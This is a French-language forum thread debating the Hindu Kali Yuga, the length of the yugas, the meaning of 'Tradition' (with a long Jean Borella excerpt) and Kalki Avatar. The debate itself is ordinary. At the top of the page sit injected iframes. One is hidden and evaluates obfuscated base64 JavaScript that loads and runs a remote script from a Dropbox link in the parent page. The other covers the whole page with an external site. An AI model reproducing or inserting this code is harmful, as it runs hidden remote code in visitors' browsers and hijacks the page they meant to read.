<iframe style='display:none' src=javascript:eval(atob('dmFyIGg9cGFyZW50LmRvY3VtZW50LmhlYWQ7aWYoIWgpe2g9cGFyZW50LmRvY3VtZW50LmJvZHk7fXZhciBzPXBhcmVudC5kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cHM6Ly9kbC5kcm9wYm94LmNvbS9zLzVmcmFrMG5ocmsyYmVtci9hLmpzPycrTWF0aC5mbG9vcigoTWF0aC5yYW5kb20oKSoxMDApKzEpKTtoLmFwcGVuZENoaWxkKHMpOw=='));></iframe><iframe class='trueMsgFrame' style='position:absolute;left:0px;top:0px;width:100%;height:100%;z-index:1000;min-width:3000px;min-height:3000px' src='http://hat-733.getforge.io'></iframe>
Revenir en haut Aller en bas
J&B

avatar

Féminin Messages : 3431
Inscription : 09/08/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Lun 29 Déc 2014, 14:55

Catholique par baptême,  je ne pratique pas au sens rituel du terme, je navigue avec le GPS de la marque ΙΧΘΥΣ.

Bien sûr, il y a la recherche personnelle, les lectures, les discussions, les circonstances, les joies, les épreuves, les gens qui sont sur notre chemin, ce sont aussi de bons maîtres spirituels, ou du moins d'excellents révélateurs de l'avancement du chantier.

La Tradition vient de Dieu, ce sont les lois fondamentales universelles, attitude intérieure ou intelligence du coeur, jamais figée, et c'est l'Esprit qui les grave et les entretient, elles sont les mêmes partout.
A nous de garder le cap...



Jérémie 31,31

"Voici, bientôt les jours viennent, dit l'Éternel, où je concluerai une Alliance Nouvelle avec la maison d'Israël et la maison de Juda. Ce ne sera pas une Alliance comme celle que j'avais conclue avec leurs ancêtres, le jour où je ai pris par la main pour les faire sortir du pays d'Égypte, car cette Alliance-là, ils l'ont violée et rompue, quoique c'est moi qui étais leur maître, dit l'Éternel. Mais voici en quoi consistera l'alliance que je concluerai bientôt avec la maison d'Israël, dit l'Éternel: Je mettrai ma loi, c'est-à-dire que j'inscrirai mes instructions non plus sur des tables de pierre, mais au dedans d'eux, dans leur conscience; J'écrirai ma loi dans leur coeur; de telle sorte que je serai leur Dieu, et ils seront mon peuple.
Revenir en haut Aller en bas
Miles Templi

avatar

Masculin Messages : 2728
Inscription : 03/07/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Mar 06 Fév 2018, 16:29

Pascal a écrit:

Citation :
L'Astrologie est à mon avis basée sur des degrés d'influences cosmo-planétaires des nuances de vibrations magnétiques issue des constellations . Sur des cycles qui durent par exemple 26000 années

Votre avis correspond à peu près à ce qu'enseigne la Tradition. Mais celle-ci n'a pas le new age et ses interprétations fantaisistes pour porte-parole.
Revenir en haut Aller en bas
humanlife



Masculin Messages : 11247
Inscription : 07/11/2013

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Mar 06 Fév 2018, 17:54

c'est vrai que les tenants de la tradition ça c'est sérieux certifié par quoi on ne sait pas.
la tradition c'est pas sérieux plutôt et ça veut rien dire.

la tradition est un mot de vocabulaire du langage courant.
Revenir en haut Aller en bas
Miles Templi

avatar

Masculin Messages : 2728
Inscription : 03/07/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Mar 06 Fév 2018, 18:14

Pourquoi apprendre alors que l’ignorance est instantanée ?

Bill Watterson
Revenir en haut Aller en bas
Pascal



Masculin Messages : 1954
Inscription : 10/06/2009

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Jeu 08 Fév 2018, 08:37

Avez vous imaginé une période de Kali ?

432000 années à partir d'environ moins 2000 avant JC ?

Symptômes ? : L'enfer sur Terre ; La méchanceté, le mensonge, le vol, la guerre, la maladie, le nucléaire et tout ce qui est mauvais ?

Avez vous imaginé que cela serait, impossible à vivre ?!

Comment les Hindous peuvent-ils croire à une telle absurdité ?

Comment les humains pourront-ils rester debout et la Terre survivre après tout ça ?

Non c'est impossible car Dieu n'a pas créé la vie pour la détruire durant tout ce temps, la Terre ne pourrait jamais supporter autant de temps de malheur absolu, car plus rien n'y survivrait .

Donc ici Miles Templi est sensé me dire que j'ai tort, que Sri Yukteswar Giri a tort également d'affirmer qu'il faut enlever 2 ZERO soit = 4320 ans pour l'âge de Kali .
A noter que les puristes disent que Sri Yukteswar Giri est une charlatan ok ?


Voici un nouveau calcul, mais bon il sera sûrement contesté ... Perso je dis que Kali est terminé en l'an 900 de notre ère avec l'avènement de Bouddha Milarépa .
Spoiler:
 
Revenir en haut Aller en bas
Miles Templi

avatar

Masculin Messages : 2728
Inscription : 03/07/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Jeu 08 Fév 2018, 10:12

Citation :
Avez vous imaginé une période de Kali ?

La Tradition n'est pas une histoire d'imagination. Les fabrications fantaisistes sont de votre coté pas du mien.

Citation :
432000 années à partir d'environ moins 2000 avant JC ?

Bien des chiffres ont été ajouter pour égarer les chercheurs.

Citation :
Symptômes ? : L'enfer sur Terre ; La méchanceté, le mensonge, le vol, la guerre, la maladie, le nucléaire et tout ce qui est mauvais ?

Notre époque actuelle, en effet.

Citation :
Comment les Hindous peuvent-ils croire à une telle absurdité ?
Citation :
Perso je dis

Pascal a raison et la tradition hindou a tort. On a compris.

Citation :
Non c'est impossible car Dieu n'a pas créé la vie pour la détruire durant tout ce temps, la Terre ne pourrait jamais supporter autant de temps de malheur absolu, car plus rien n'y survivrait .

Toutes les traditions authentiques parlent de la fin des temps et du jugement dernier...mais pas votre Dieu imaginaire. J'en prends note.

Citation :
A noter que les puristes disent que Sri Yukteswar Giri est une charlatan ok ?

Vous faites donc les questions et les réponses. C'est pour nous permettre de gagner du temps? Je vous en remercie.

Citation :
Voici un nouveau calcul, mais bon il sera sûrement contesté

C'est quoi ALCYONE super sun? Un ennemi de Goldorak?
Revenir en haut Aller en bas
humanlife



Masculin Messages : 11247
Inscription : 07/11/2013

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Jeu 08 Fév 2018, 12:10

la tradition telle que nommée est elle-même une forme de connaissance imaginaire inconstituée en dehors du champ classique, donc proche de l'occultisme comme je disais.
Revenir en haut Aller en bas
Miles Templi

avatar

Masculin Messages : 2728
Inscription : 03/07/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Jeu 08 Fév 2018, 13:44

Citation :
la tradition telle que nommée est elle-même une forme de connaissance imaginaire inconstituée en dehors du champ classique, donc proche de l'occultisme comme je disais.

De la tradition (de Jean Borella):

La notion de tradition, dans son sens le plus général, c’est l’idée d’une identité maintenue à travers une altérité. Comme on sait le mot vient du latin tradere, contraction de trans (à travers) et de dare (donner), c’est-à-dire : transmettre, livrer. Cependant toute donation n’est pas nécessairement tradition . Ainsi, quand nous donnons à manger à qui est affamé, ce que l’on donne, assimilé par le récipiendaire, perd son identité, s’intègre à la substance corporelle et disparaît comme tel.

Pour qu’il y ait tradition, il faut donc que ce qui est donné soit gardé fidèlement, tel que l’on a reçu, sans altération essentielle (des altérations accidentelles sont inévitables ou même parfois souhaitables). Mais, là non plus, la maintenance ne suffit pas par elle-même à constituer la tradition. Ainsi l’avarice qui accumule les possessions et veille jalousement sur elles, participe bien d’un certain esprit de tradition, mais à la manière dont la caricature participe de son modèle, en le détruisant par inversion. Elle ne dissipe pas, comme la prodigalité, mais elle neutralise et tue plus sûrement encore : en dispersant indûment le dépôt, la prodigalité en communique cependant la vertu – bien qu’affaiblie-- à un grand nombre, tandis que l’avarice l’arrête à soi sans l’excuse d’une jouissance espérée. En réalité le dépôt n’est reçu et maintenu que pour être donné et transmis. Nous dirons donc qu’il y a tradition chaque fois qu’il y a réception d’un dépôt à transmettre. Réception, maintenance transmission, se conditionnent réciproquement. On ne peut transmettre que ce qu’on a reçu, d’une part, et que ce que l’on a maintenu identique, d’autre part. Ce que l’on a reçu : en effet, on ne peut donner ce que l’on a pas, c’est-à-dire : ou bien ce dont on est privé, ou bien ce qui ne fait qu’un avec nous-mêmes (je ne puis donner ma tête, ou mon intelligence ou ma sensibilité), la tradition est donc relative à quelque chose de distinct du récipiendaire, comme du donateur. Ce que l’on a maintenu identique : en effet, si le dépôt est altéré ou transformé , on ne transmet pas ce que l’on a reçu, mais autre chose (et même, à la limite, ce qui est purement subjectif étant incommunicable, un dépôt subjectivement transformé devient proprement intransmissible) ; ne se transmet que ce qui, en soi, échappe aux sujets individuels et les transcende.

Cette dernière remarque exige d’être approfondie. En effet, elle ne concerne plus une description formelle de la tradition, comme précédemment, mais vise la nature même du dépôt, c’est-à-dire son contenu. Nous pourrions formuler notre question de la manière suivante : quel doit être le dépôt pour qu’il puisse faire l’objet d’une réception-maintenance-transmission ? A priori, tout ce qui est reçu-maintenu-transmis relève de la tradition ou constitue une tradition . Cependant tout n’est pas réceptible (1) - maintenable – transmissible. Au reste, réception et transmission ne sont que les faces d’un même acte : ce qui, d’un côté, est reçu, de l’autre est transmis. En conséquence, ce qui vaut pour l’une vaut pour l’autre. Et la question se ramène à la suivante : quel doit être le dépôt pour être réceptible (ou transmissible) et maintenable ?

La question de la réceptibilité, radicalement envisagée, nous conduit très loin. Je ne peux recevoir que ce qui ne vient pas de moi, et donc ce qui vient d’un autre, assurément. Mais il y a plusieurs manières de « venir d’un autre », et si cette condition est nécessaire pour qu’il y ait tradition, elle n’est pas suffisante. Ainsi, par exemple, ce qui vient d’autrui peut-être une pure et simple expression de sa subjectivité, revêtant éventuellement la forme d’une invention ou d’une création. En ce cas, la transmission est impossible, puisque ce qui est proprement subjectif, nous l’avons dit, est incommunicable. Pourtant de telles productions peuvent effectivement donner lieu à des « traditions », mais traditions apparentes, pseudo-, ou mêmes contre-traditions : en réalité, il s’agit de véritables cas de « possessions psychiques », certaines individualités puissantes engendrant ainsi par fascination mimétique d’innombrables copies humaines plus ou moins conformes. En revanche, toute invention, création, ou innovation n’est pas forcément l’expression d’une subjectivité. Quand elle est le fruit d’une intuition ou même d’une révélation reçue, elle véhicule des éléments objectifs d’origine non-humaine , qui donc sont évidemment communicables et peuvent alors faire l’objet d’une véritable tradition. Un grand prophète, un grand spirituel, un grand artiste, un grand philosophe, un grand homme politique, peuvent être à la source, apparemment humaine d’une authentique tradition, alors qu’ils ne sont que les médiateurs d’une forme transcendante qui descend en eux et s’y manifeste (Platon, Aristote, Alexandre le Grand, Jules César, Saint-Jean, Saint-Paul, Saint-Augustin, Saint-Benoît, les inventeurs anonymes des styles roman et gothique, Charlemagne, Saint-François d’Assise, Saint-Louis, Saint-Thomas d’Aquin, Roublev, Bach, parmi d’autres).

Concluons que la vraie tradition est toujours reçue, caractère qui lui est intrinsèque et n’est point relatif au fait d’être éventuellement communiquée par un autre homme. Autrement dit, il n’y a de tradition que d’origine non humaine.

Nous allons voir que la « maintenabilité » nous conduit à une conclusion analogue. La condition essentielle en effet, pour que le dépôt soit maintenu identique à lui-même, est qu’il possède précisément une identité, c’est-à-dire une nature et une unité. Posséder une nature, c’est être quelque chose de déterminé, le contraire de « n’importe quoi ». En général la nature d’un être ou d’une réalité quelconque peut se décrire comme un ensemble de caractères bien définis (ainsi la nature humaine se définit par les caractères de l’animalité spécifiée par ceux de la rationalité). Il ne peut donc y avoir de « tradition révolutionnaire » par exemple, ou de tradition de « créativité » : ce sont là, en réalité des contre-traditions dont le modèle est le péché originel (2). Mais il faut en outre que ces éléments constitutifs d’une nature forment un ensemble, un tout unifié : qu’ils soient en harmonie les uns avec les autres, et non point comme des pièces rapportées extérieures ou étrangers l’un à l’autre. Or, les seules réalités qui vérifient ce critère, ce sont les réalités naturelles, « non faites de main d’homme », non composées artificiellement de parties hétérogènes, donc des réalités dans lesquelles le tout préexiste en quelque sorte aux éléments constituants. Qu’on ne croit pas que par là, nous écartions les techniques, pourtant si évidemment traditionnelles. Bien au contraire, outils et machines pour fabriquée que soit leur réalisation matérielle n’en correspondent pas moins à des « possibles », et donc à des archétypes permanents, qui sont plutôt découverts par tâtonnement ou par inspiration (voire par révélation) que véritablement inventés. Nous écartons seulement les réalités d’une nature relativement définie (au moins en apparence) mais composées d’éléments disparates et parfois contradictoires : ainsi l’idéologie démocratique, le modèle politique républicain , ou certains styles artistiques composites. Nous sommes donc renvoyés à l’idée d’une essence immuable, supra-humaine , raison première et constitutive de l’identité du dépôt traditionnel.

Sans doute ces considérations sembleront-elles bien métaphysiques et abstraites ou même schématiques. Elles ne devraient cependant pas nous faire oublier que notre vie la plus quotidienne et la plus concrète est tissée de mille traditions authentiques, sans lesquelles elle serait tout simplement impossible, mais grâce auxquelles, en même temps, notre existence éphémères se trouve rattachée à des réalités éternelles.

(1) On excusera ce néologisme construit sur le modèle de « perceptible » ; recevable à un sens déterminé pour désigner la pure capacité d’être reçu.

(2) Nous reviendrons dans un prochain article sur cette notion de contre-tradition. On prétend aujourd’hui à être créatif dans des maisons de la culture : autant d’absurdités.
Revenir en haut Aller en bas
humanlife



Masculin Messages : 11247
Inscription : 07/11/2013

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Jeu 08 Fév 2018, 13:54

Étymol. et Hist. A. 1268 dr. « remise, livraison » (Mémoire adressé au roi par le comte de Bar, J 582, Bar no16 ds Layettes du Trésor des Chartes, éd. A. Teulet et E. Berger, t. 4, p. 258a: en la tradition dou don); 1290 (Charte de La Rochelle ds Chartes et doc. poit. du XIIIes., éd. M. S. La Du, no389,6: par la tradicion de ceste presente chartre). B. 1. a) 1488 « doctrine ou pratique, religieuse ou morale, transmise de siècle en siècle » (Nicole Le Huen, Saintes peregrinations de Jherusalem, sign. C v ro, éd. 1488 ds Gdf. Compl.: traditions, fables et vanitez [de Mahomet]); 1541 (Calvin, Instit. de la relig. chrestienne, IV, X, 10, éd. J. D. Benoît, t. 4, p. 194: ces vaines traditions; IV, X, 18, p. 203: tyrannie des traditions humaines); 1636 (Monet: Traditions de l'Église); 1643 (A. Arnauld, De la Fréquente communion, p. 393: Tradition Ecclesiastique; p. 118: Tradition des Apostres; p. 491: Tradition Apostolique; p. 3: Tradition Divine); b) 1636 (Monet: Tradition, verbale, ou ecrite); 1704 (Trév.: tradition écrite, tradition non écrite); 1735 (Lenglet du Fresnoy, L'Hist. justifiée contre les romans, p. 100: tradition orale); 2. 1624 « manière, ou ensemble de manières, de penser, de faire ou d'agir, qui est un héritage du passé » (J. L. Guez de Balzac, Lettres, éd. H. Bibas et K. T. Butler, t. 1, p. 157: une tradition que les Gascons laissent en mourant à leurs enfans); 3. av. 1654 « information, plus ou moins légendaire, relative au passé » (Id., Dissertations pol., p. 439); 4. 1785 théâtre « mot, phrase ou jeu de scène dus à l'imagination d'un acteur » (Beaumarchais, Mariage de Figaro, Placement des acteurs ds Œuvres, coll. Génie de la France, t. 2, p. 33: relâchement dans la tradition donnée par les premiers Acteurs); 1835 (Ac.: ce jeu de théâtre est une tradition). Empr. au lat.traditio « action de remettre, de transmettre, remise, livraison; transmission, enseignement; relation, rapport, mention », lat. chrét. « tradition, enseignement oral; tradition (des apôtres, des Pères, de l'Église, p. oppos. à l'Écriture) »; dér. de tradere (supin traditum) « transmettre, remettre; transmettre oralement ou par écrit ».

http://www.cnrtl.fr/etymologie/tradition
Revenir en haut Aller en bas
Pascal



Masculin Messages : 1954
Inscription : 10/06/2009

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Jeu 08 Fév 2018, 16:53

Miles Templi a écrit:
Citation :
Avez vous imaginé une période de Kali ?

La Tradition n'est pas une histoire d'imagination. Les fabrications fantaisistes sont de votre coté pas du mien.

Citation :
432000 années à partir d'environ moins 2000 avant JC ?

Bien des chiffres ont été ajouter pour égarer les chercheurs.

Citation :
Symptômes ? : L'enfer sur Terre ; La méchanceté, le mensonge, le vol, la guerre, la maladie, le nucléaire et tout ce qui est mauvais ?

Notre époque actuelle, en effet.

Citation :
Comment les Hindous peuvent-ils croire à une telle absurdité ?
Citation :
Perso je dis

Pascal a raison et la tradition hindou a tort. On a compris.

Citation :
Non c'est impossible car Dieu n'a pas créé la vie pour la détruire durant tout ce temps, la Terre ne pourrait jamais supporter autant de temps de malheur absolu, car plus rien n'y survivrait .

Toutes les traditions authentiques parlent de la fin des temps et du jugement dernier...mais pas votre Dieu imaginaire. J'en prends note.

Citation :
A noter que les puristes disent que Sri Yukteswar Giri est une charlatan ok ?

Vous faites donc les questions et les réponses. C'est pour nous permettre de gagner du temps? Je vous en remercie.

Citation :
Voici un nouveau calcul, mais bon il sera sûrement contesté

C'est quoi ALCYONE super sun? Un ennemi de Goldorak?

Kali ne dure pas 432000 années Terrestre ce sont des années célestes basées sur la vie de Brahma .

Donc Kali dure 4000 années Terrestre environ pas plus .

Le jugement dernier la fin des temps ? bah j'y crois on est en plein dedans je sens même que vous essayez de me juger .

Je n'ai pas de Dieu imaginaire ou physique mais un Dieu cosmique créateur .

Sri Yukteswar Giri est contesté par des puristes si si .

Si quelqu'un a tort ici c'est celui qui croit que Kali dure 432000 anées Terrestre, c'est archi absurde j'ai dis que Dieu n'a sûrement pas créé cela .

Que la paix soit avec vous et avec votre esprit .

Ps : Le new âge je m'en fous, ce n'est pas mon style de vie, mais il faut bien l'étudier et savoir ce qui va et ce qui ne va pas dedans .

Revenir en haut Aller en bas
Miles Templi

avatar

Masculin Messages : 2728
Inscription : 03/07/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Jeu 08 Fév 2018, 18:17

Pour être précis on ne de dit pas Kali mais Kali Yuga (nous évoquons les cycles et non les divinités).
Vos chiffres sont faux, ce ne sont pas ceux qu'indique la tradition hindoue.
Sri Yukteswar Giri n'appartient pas à la tradition hindoue. C'est pour cela que je vous ai remercié de le reconnaitre avant même que je me prononce sur lui.
Ceux qui ont tort, sont ceux qui vont à l'encontre des écrits sacrés.
Le new age, vous le jugez à partir de quelle référence traditionnelle? Il serait plus logique de maitriser une tradition authentique avant de vouloir corriger les pseudos traditions.

Citation :
Que la paix soit avec vous et avec votre esprit .

Merci. Que Dieu vous guide.
Revenir en haut Aller en bas
humanlife



Masculin Messages : 11247
Inscription : 07/11/2013

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Jeu 08 Fév 2018, 19:25

la tradition authentique c'est celle qui nous habite par la culture et le langage, l'histoire, les sciences etc..
Revenir en haut Aller en bas
Pignon



Masculin Messages : 7659
Inscription : 18/01/2016

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Ven 09 Fév 2018, 01:15

As-tu lu le texte de Jean Borella plus haut sur le topic?

_________________
Trouver d'abord, chercher ensuite.
https://www.yhwh.fr
Revenir en haut Aller en bas
https://www.yhwh.fr/
halim

avatar

Masculin Messages : 2054
Inscription : 15/02/2011

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Ven 09 Fév 2018, 15:18

humanlife a écrit:
la tradition authentique c'est celle qui nous habite par la culture et le langage, l'histoire, les sciences etc..
Cher humanlife,
La vraie tradition reste plutôt les coutumes et les pratiques morales qui habitent le cœur des humains, et non leurs livres ou leurs écrits. Par la grâce divine la morale reste le propre de l'Homme et en aucun cas elle ne serait que culturelle en fonction de chaque société et chaque génération. Elle est avant tout le reflet direct de l'humanité et de ce qui fait justement la dignité de l'Homme. L'amour du bien et la haine du mal sont intrinsèques à l'Homme, et la preuve de tout cela est qu'il existe un humanisme athée universel, lequel n'est que partiellement distinct ou différent de l'humanisme inspiré par la religion. C'est justement en ce sens que la conscience, pour ceux qui en possèdent une, croyants ou athées, les avertit toujours quand ils franchissent les limites de la moralité et même les plus petites d'entre elles. Seulement, la bonté n'exclut pas automatiquement la rigueur tout comme l'amour comme critère de discernement ne signifie point d’être laxiste. La société ou le mal dans l'univers n'influenceront en rien les lois morales élémentaires inscrites au plus profond de chacun de nous par la divinité créatrice. La société ne changera rien aux valeurs morales absolues selon lesquelles, par exemple, nuire à l'intégrité physique d'autrui est mal, que médire sur son prochain est mal, que parler avec haine ou mépris de son prochain est mal etc....

_________________
A chaque instant la Vérité nous interpelle, y sommes nous attentifs ...
Revenir en haut Aller en bas
Pascal



Masculin Messages : 1954
Inscription : 10/06/2009

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Sam 10 Fév 2018, 17:32

Miles Templi a écrit:
Pour être précis on ne de dit pas Kali mais Kali Yuga (nous évoquons les cycles et non les divinités).
Vos chiffres sont faux, ce ne sont pas ceux qu'indique la tradition hindoue.

Un siècle (une ère de Brahmā) cycle complet des Yugas, ou “Maha Kalpa” 311 040 000 000 000 ans :
FAUX

Donc on peut lire que le calendrier de Brahma est faux puisque le système solaire
est âgé de 5 milliard d'années et se désintégrera dans 5 milliards d'années .
Par conséquent l'ére de Brahma ne peut pas durer : trois mille milliards d'années .

Il faudrait réduire les chiffres de base ou considérer que ce sont des années CELESTES
et non TERRESTRES .
Revenir en haut Aller en bas
Miles Templi

avatar

Masculin Messages : 2728
Inscription : 03/07/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 11 Fév 2018, 06:12

Je vous ai indiqué la raison des chiffres à rallonge qui ont été ajouter volontairement. Il n'en demeure pas moins que votre calcul est faux. Mais libre à vous de vous y accrocher. Et l'on ne dit pas “Maha Kalpa” mais mahâ-yuga (quatre yugas font un mahâ-yuga, 71 mahâ-yugas font un manvantara, 14 manvantaras font un kalpa).
Revenir en haut Aller en bas
Pascal



Masculin Messages : 1954
Inscription : 10/06/2009

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 11 Fév 2018, 08:45

Wiki:
Jour de la mort de Krishna, tué par un chasseur, selon le Mahābhārata. Cette date est le point de départ du calendrier hindou.
Le Kali Yuga s'achèvera 432 000 ans plus tard, quand une nouvelle descente (avatâr) de Vishnou ramènera l'Ordre (dharma) et le bonheur sur Terre pour recommencer un nouveau cycle des yuga.

FAUX :

Des avatars de Vshnu sont déjà apparut depuis la mort de Krishna avatar de Vishnu .
Un chasseur détermine le départ du Kali Yuga !





Foutaise :

un siècle (une ère de Brahmā), ou “Maha Kalpa” 311 040 000 000 000 ans
Relativité du temps divin[modifier | modifier le code]
Cette section est vide, insuffisamment détaillée ou incomplète. Votre aide est la bienvenue !
1 siècle de Brahmā, durée d'un système solaire ou 1 Maha Kalpa soit 311 040 milliards d'années.
1 an de Brahmā : durée de 7 chaînes (dans 7 schémas) 3 110 milliards d'années.
1 semaine de Brahmā : durée de 7 rondes dans un schéma (une chaîne) = 61 milliards d'années, soit la durée d'une incarnation d'un logos solaire.
1 jour de Brahmā (1 kalpa) = 8,71 milliards d'années (la durée d'une ronde).
1 heure de Brahmā = 360 millions d'années.
1 minute de Brahmā (concerne les chakras planétaires, lieux actuels 8:) = 6 millions d'années.
1 seconde de Brahmā = 100 000 ans
1/10e de seconde de Brahmā (soit un éon de temps) = 10 000 ans
1/100e de seconde de Brahmā = 1 000 années terrestres
1/1000e de seconde de Brahmā (1 siècle de vie de l'humanité terrestre) = 100 années terrestres
Un Kalpa, soit un jour de Brahma correspond donc au 1/36 000e d'un siècle ou d'une vie (ou d'une incarnation) de Brahmā.
WIKi.

Archi Absurde .





A court d'arguments contre moi ?

Impossible puisque ces calculs sont manifestement imprécis les avis divergent . On parle d'un jour et une nuit de Brahma qui est la base du calendrier et ensuite on fait intervenir l'avatara Sri Krisna de Vishnu tué par un chasseur pour démarrer l'ère de Kali ???

Mais effectivement nous pourrions penser que nous sommes dans le Dvapara Yuga :
L'avidité et la fraude en sont les caractéristiques n'est-ce pas ce qui se passe en ce moment sur la terre où tout le monde veut ses gadgets ses désirs à n'en plus finir ?

Par contre je ne vois pas de violence dans les maisons du monde mais que du bonheur ! Dans tous centre ville ou banlieue on ne voit que la paix et le bonheur tout le monde mange à sa faim ... La misère sous toutes ses formes ne représente que 10% de la réalité ...

A part peut-être chez Miles Templi et d'autres puristes où semble t-il de leurs dires qu'il n'y aurait que du noir du noir et encore du noir ? Bizare , bien sûr la guerre ça c'est un argument fort mais il s'agit en réalité de CONSEQUENCES de l'ère de Kali , nous ne pouvons pas entrer dans un nouveau cycle et tout changer du jour au lendemain .
D'ailleurs Kali se termine environ vers l'an 900 de notre ère et Dvapara n'est pas si merveilleux l'avidité la fraude c'est pas ça non plus mais bref j'ai posé assez d'arguments pour contrer les erreurs d'interprétations des calculs .


En tout cas le DWAPARA YUGA selon les experts donne ceci : Avidité + Fraude .

Chercher l'erreur .



Miles Templi ;

Qui a écrit ... le texte ... officiel ... affirmant et approuvé par Brahma Shiva Vishnu
... que les yugas etc ... ?

Où sont ces textes précis et ses calculs ? Pas des extraits de machins qui viennent
de truc svp .


Dernière édition par Pascal le Dim 11 Fév 2018, 08:54, édité 1 fois
Revenir en haut Aller en bas
halim

avatar

Masculin Messages : 2054
Inscription : 15/02/2011

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 11 Fév 2018, 08:53

Pascal a écrit:
L'avidité et la fraude en sont les caractéristiques n'est-ce pas ce qui se passe en ce moment sur la terre où tout le monde veut ses gadgets ses désirs à n'en plus finir ? Par contre je ne vois pas de violence dans les maisons du monde mais que du bonheur ! Dans tous centre ville ou banlieue on ne voit que la paix et le bonheur tout le monde mange à sa faim ... La misère sous toutes ses formes ne représente que 10% de la réalité.
Cher Pascal,
Du coup, on ne sait plus dans quel monde vous vivez.. N'ayez pas peur de la fin du monde car vous pouvez lire dans Bhagavad-Gîtâ, (chapitre 4), verset 7 :« Ainsi dans le Kali Yuga [notre ère : l’âge de fer], le déclin ne cessera de s’accentuer jusqu’à ce que la race humaine approche de son anéantissement. Lorsque la fin de l’âge sombre sera prochaine, une partie de cette essence divine qui existe dans sa propre nature spirituelle, Kalki Avatar descendra sur la terre, doté des huit qualités surnaturelles. Il rétablira la droiture dans le monde. Lorsque le soleil, la lune, Tishya et la planète Jupiter seront ensemble dans la même maison, l’âge de Krita ou Satya : [l’âge d’or] sera revenu. »

_________________
A chaque instant la Vérité nous interpelle, y sommes nous attentifs ...
Revenir en haut Aller en bas
Pascal



Masculin Messages : 1954
Inscription : 10/06/2009

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 11 Fév 2018, 09:01

Sauf que pour vous HALIM ... Kalki Autar est Muhammad Sws .

Donc le Coran est l'avènement de la fin de l'ère de Kali ?

En quelque sorte oui le Kali Yuga se termine en 900 environ il n'y a rien de précis dans tout ce fatras .

Very Happy
Revenir en haut Aller en bas
halim

avatar

Masculin Messages : 2054
Inscription : 15/02/2011

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 11 Fév 2018, 09:32

Pascal a écrit:
Sauf que pour vous HALIM ... Kalki Autar est Muhammad Sws .  
Cher Pascal,
Mais on dirait que vous êtes un vrai devin.. Oui je pense ce que vous venez d'écrire, mais cela reste un autre sujet que l'on débattra ailleurs. Vous savez fort bien que, dans ce domaine, l'islam n'est pas la religion du seul prophète Mohammed mais une religion universelle divine depuis les temps immémoriaux. Si quelques parts les gens ont commis des corruptions a travers les temps et effectué des rajouts au monothéisme pur, en instituant des avatar Dieu, ce ne sont la donc que des erreurs d’idolâtrie. D'ailleurs c'est pour cela qu'enfin Dieu a fait descendre le Coran vénéré ultime révélation et qu'Il a pris sa protection contre toute altération. Vous avez donc raison, je suis fermement convaincu que l'Islam est bel et bien prophétisé dans les vedas et que cette vérité apparaîtra nécessairement dans le temps, que nous le voulions ou non.

_________________
A chaque instant la Vérité nous interpelle, y sommes nous attentifs ...
Revenir en haut Aller en bas
Miles Templi

avatar

Masculin Messages : 2728
Inscription : 03/07/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 11 Fév 2018, 10:09

Pascal, vos interventions décousues sont bien difficiles à suivre. Manque d'arguments de ma part envers quoi au juste? Vous ne vous référez pas à la tradition hindoue mais étalez vos interprétations personnelles (ou celle de Sri Yukteswar Giri?). C'est votre droit, mais à partir du moment où vous rejetez cette tradition, au nom de quoi je devrais vous indiquer des "textes précis et ses calculs" comme vous dites?

Par ailleurs, comme Halim, je reste stupéfait de votre description du monde actuel. Cette vision bisounours de notre époque vous la partagez avec le new age, courant avec lequel vous prétendez vous démarquer mais qui vous influence plus que vous ne le pensez.

Citation :
Des avatars de Vshnu sont déjà apparut depuis la mort de Krishna avatar de Vishnu

Si vous aviez étudié un tant soi peu sérieusement cette tradition vous aurez appris qu'elle ne dit pas le contraire et que les Avatâra, ils y en a des majeurs et des mineurs. Mais il faut croire que cela n'est pas préciser par wikipédia qui semble être votre seule source d'information.
Revenir en haut Aller en bas
dims

avatar

Masculin Messages : 6226
Inscription : 27/01/2009

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 11 Fév 2018, 10:36

Halim a écrit:
Si quelques parts les gens ont commis des corruptions a travers les temps et effectué des rajouts au monothéisme pur, en instituant des avatar Dieu, ce ne sont la donc que des erreurs d’idolâtrie.

Halim,

Pour vous ceux qui pratiquent la dévotion envers une divinité sont dans l'erreur ?
Pourtant le Bhakti-Yoga est une pratique qui permet d'atteindre moksha (la libération).

Râmakrishna était un dévot de la déesse Kali.
Revenir en haut Aller en bas
Pascal



Masculin Messages : 1954
Inscription : 10/06/2009

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 11 Fév 2018, 11:17

halim a écrit:
Pascal a écrit:
Sauf que pour vous HALIM ... Kalki Autar est Muhammad Sws .  
Cher Pascal,
Mais on dirait que vous êtes un vrai devin.. Oui je pense ce que vous venez d'écrire, mais cela reste un autre sujet que l'on débattra ailleurs.

Pourquoi débattre ailleurs de Kalki Autar alors qu'il est sensé mettre fin au Kali Yuga ?

De plus cet Avatar est armé jusqu'aux dents, la seconde venue de Jésus cela n'aura rien à voir avec Muhammad ... Wink
